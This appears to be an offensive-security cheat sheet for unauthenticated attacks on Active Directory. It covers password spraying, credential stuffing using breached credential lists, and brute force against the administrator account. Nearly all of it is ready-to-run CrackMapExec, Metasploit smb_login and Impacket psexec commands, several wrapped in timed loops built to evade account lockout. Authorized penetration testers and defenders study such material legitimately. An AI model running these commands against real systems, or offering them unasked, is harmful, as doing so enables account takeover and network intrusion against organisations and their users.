Non-Authenticated (External) Attacks

Password Spraying

Requirements: User list, common passwords, understanding of domain lockout policy

Password Spraying Execution

# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success

# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
    crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
    sleep 1800  # 30-minute delay between password attempts
done

---

Credential Stuffing

Requirements: Breach credential data matching target organization, network access to domain services

Credential Preparation

# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txt

Credential Stuffing Execution

CrackMapExec Method

# Test credential pairs without brute force permutation
crackmapexec smb <DC-IP> -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

Metasploit Method

# Credential validation module
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set USERPASS_FILE /path/to/domain_creds.txt
set STOP_ON_SUCCESS false
run

---

Brute Force Attacks

Requirements: Target administrative accounts, comprehensive password lists, understanding of lockout policies

Targeted Brute Force

CrackMapExec Method

# Single account brute force with lockout avoidance
crackmapexec smb <DC-IP> -u 'administrator' -p passwords.txt --continue-on-success

# Time-delayed brute force for lockout evasion
for password in $(head -4 passwords.txt); do  # Test only 4 passwords per cycle
    crackmapexec smb <DC-IP> -u 'administrator' -p "$password"
    sleep 5
done
sleep 1800 # Wait 30 minutes before next cycle

Impacket Method

# Protocol-specific brute force
for password in $(cat admin_passwords.txt); do
    python3 psexec.py <domain>/administrator:"$password"@<DC-IP> 2>/dev/null
    if [ $? -eq 0 ]; then echo "SUCCESS: administrator:$password"; break; fi
    sleep 60
done